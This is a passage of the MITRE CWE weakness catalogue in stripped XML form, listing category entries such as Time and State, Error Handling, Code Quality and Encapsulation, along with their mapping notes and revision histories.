Kingdoms, "Distributed computation is about time and state. That is, in order for more than one component to communicate, state must be shared, and all that takes time. Most programmers anthropomorphize their work. They think about one thread of control carrying out the entire program in the same way they would if they had to do the job themselves. Modern computers, however, switch between tasks very quickly, and in multi-core, multi-CPU, or distributed systems, two events may take place at exactly the same time. Defects rush to fill the gap between the programmer's model of how a program executes and what happens in reality. These defects are related to unexpected interactions between threads, processes, time, and information. These interactions happen through shared state: semaphores, variables, the file system, and, basically, anything that can store information." + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, References, Related_Attack_Patterns, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Time and State + + + + Weaknesses in this category are related to improper management of system state. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. Consider using the File Handling Issues category (CWE-1219). + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Temporary File Issues + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Technology-Specific Time and State Issues + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Time and State Issues + + + + Weaknesses in this category are related to the improper handling of signals. + + + + + + Signal Errors + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Several weaknesses could exist, but this needs more study. Some weaknesses might be unhandled signals, untrusted signals, and sending the wrong signals. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Maintenance_Notes, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2009-07-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that occur when an application does not properly handle errors that occur during processing. According to the authors of the Seven Pernicious Kingdoms, "Errors and error handling represent a class of API. Errors related to error handling are so common that they deserve a special kingdom of their own. As with 'API Abuse,' there are two ways to introduce an error-related security vulnerability: the most common one is handling errors poorly (or not at all). The second is producing errors that either give out too much information (to possible attackers) or are difficult to handle." + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + Consider mapping to weaknesses that are members of this Category. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Error Handling + + + + This category includes weaknesses that occur if a function does not generate the correct return/status code, or if the application does not handle all possible return/status codes that could be generated by a function. This type of problem is most often found in conditions that are rarely encountered during the normal operation of the product. Presumably, most bugs related to common conditions are found and eliminated during development and testing. In some cases, the attacker can directly control or influence the environment to trigger the rare conditions. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Many researchers focus on the resultant weaknesses and do not necessarily diagnose whether a rare condition is the primary factor. However, since 2005 it seems to be reported more frequently than in the past. This subject needs more study. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-12-28 + updated Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Other_Notes, References, Relationships, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that do not directly introduce a weakness or vulnerability, but indicate that the product has not been carefully developed or maintained. According to the authors of the Seven Pernicious Kingdoms, "Poor code quality leads to unpredictable behavior. From a user's perspective that often manifests itself as poor usability. For an adversary it provides an opportunity to stress the system in unexpected ways." + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Common_Consequences, Description, Detection_Factors, Name, References, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Code Quality + Indicator of Poor Code Quality + + + + Weaknesses in this category are related to improper management of system resources. + + + + + + + + + + + + + + + + + + + + + + + + + + + Resource Management Errors + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1287]. This CWE ID may have become widely-used because of NIST's usage in NVD from 2008 to 2016 (see CWE-635 view, updated to the CWE-1003 view in 2016). + Some weakness-oriented alternatives might be found as descendants under Uncontrolled Resource Consumption (CWE-400). + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Environment Issues + + + + Weaknesses in this category are related to improper handling of locks that are used to control access to resources. + + + + + + + + + + + + + Resource Locking problems + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to improper handling of communication channels and access paths. These weaknesses include problems in creating, managing, or removing alternate channels and alternate paths. Some of these can overlap virtual file problems and are commonly used in "bypass" attacks, such as those that exploit authentication errors. + + + + + + + + + + + + + + + + + CHAP.VIRTFILE + Channel and Path Errors + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + Most of these issues are probably under-studied. Only a handful of public reports exist. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Maintenance_Notes, Name, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Channel and Path Errors + + + + This category has been deprecated because it redundant with the grouping provided by CWE-417. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Channel Errors + + + + Weaknesses in this category are related to improper management of handlers. + + + + + + + + Handler Errors + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to unexpected behaviors from code that an application uses. + + + + + + + + + + + + + + + + + + + + + + + + Behavioral problems + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Web Problems + + + + This weakness has been deprecated because it was a duplicate of CWE-355. All content has been transferred to CWE-355. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Applicable_Platforms, Description, Name, Relationships, Research_Gaps, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + User Interface Quality Errors + User Interface Errors + + + + Weaknesses in this category occur in behaviors that are used for initialization and breakdown. + + + + + + + + + + + + Initialization and Cleanup Errors + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Research_Gaps + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Research_Gaps + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Data Structure Issues + + + + Weaknesses in this category are related to improper handling of pointers. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that occur when the product does not sufficiently encapsulate critical data or functionality. According to the authors of the Seven Pernicious Kingdoms, "Encapsulation is about drawing strong boundaries. In a web browser that might mean ensuring that your mobile code cannot be abused by other mobile code. On the server it might mean differentiation between validated data and unvalidated data, between one user's data and another's, or between data users are allowed to see and data that they are not." + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + The "encapsulation" term is used in multiple ways. Within some security sources, the term is used to describe the establishment of boundaries between different control spheres. Within general computing circles, it is more about hiding implementation details and maintainability than security. Even within the security usage, there is also a question of whether "encapsulation" encompasses the entire range of security problems. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings, Terminology_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Common_Consequences, Description, Maintenance_Notes, Name, Other_Notes, References, Relationships, Taxonomy_Mappings, Terminology_Notes, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Encapsulation + Insufficient Encapsulation + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Other_Notes, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Other_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mobile Code Issues + + + + This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Byte/Object Code + + + + This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Motivation/Intent + + + + This category has been deprecated as it was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Intentional + Intentionally Introduced Weakness + + + + This category has been deprecated as it was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Nonmalicious + Intentionally Introduced Nonmalicious Weakness + + + + This category has been deprecated as it was originally used for 